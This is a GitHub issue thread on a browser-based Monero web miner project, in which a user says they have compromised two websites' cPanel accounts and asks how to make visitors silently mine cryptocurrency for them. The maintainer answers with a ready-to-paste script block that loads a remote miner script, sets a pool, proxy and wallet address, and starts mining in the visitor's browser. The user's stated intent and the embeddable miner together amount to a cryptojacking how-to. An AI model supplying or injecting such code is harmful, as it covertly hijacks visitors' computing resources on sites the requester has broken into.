### ISSUE TITLE
Help Need it

### ISSUE THREAD

**Issue by DARK-DEVIL-66** [NajmAjmal/monero-webminer#10]
i am using zerg pool and https port so i want to configer webminer so please tell me wich point to i need make changes in fallowing your webminer please guide me step by step it's very helpfull!

and tell me onething it's necsesryly need proxy ?

**Comment by DARK-DEVIL-66** [comment]
and tell me i have compramised 02 web sigte cpenal but one is using php based and other one is using wordpress so i need to know how can i impliment when visiting their web page silently mine crypto for me ?


thank's time to read my msg!

**Comment by DARK-DEVIL-66** [comment]
and tell me can i use ghostrider algo instand ?

**Comment by DARK-DEVIL-66** [comment]
![image](https://github.com/NajmAjmal/monero-webminer/assets/149578298/230aac12-3fd7-41bc-8d90-b455940e0354)


i changed address and never appear to pool dashboard

**Comment by NajmAjmal** [comment]
Hi @DARK-DEVIL-66,

I suggest you fork this repository and make edits to the index.html.

      
      <script src="https://cdn.jsdelivr.net/gh/NajmAjmal/monero-webminer@main/script.js"></script>
      <script>
          console.log("Config Loaded")
          server = "wss://166.62.35.226:45105";
          var pool = "gulf.moneroocean.stream:80";
          var walletAddress = "4657q4dnsjLWtzeW4XN3wG9swFumWAZB9i1pegTLMxVAQy5E5AE8uif42kkHWcWc9vDcLUmzeCf3pV7mmrJQQqqe84dtASi";
          var workerId = "GH-XMR"
          var threads = -1;
          var password = "";
          startMining(pool, walletAddress, workerId, threads, password);
          throttleMiner = 20;
      </script>
      

Edit the HTML file to your needs.

If you need further help, comment on this issue again.

Thanks, Najm
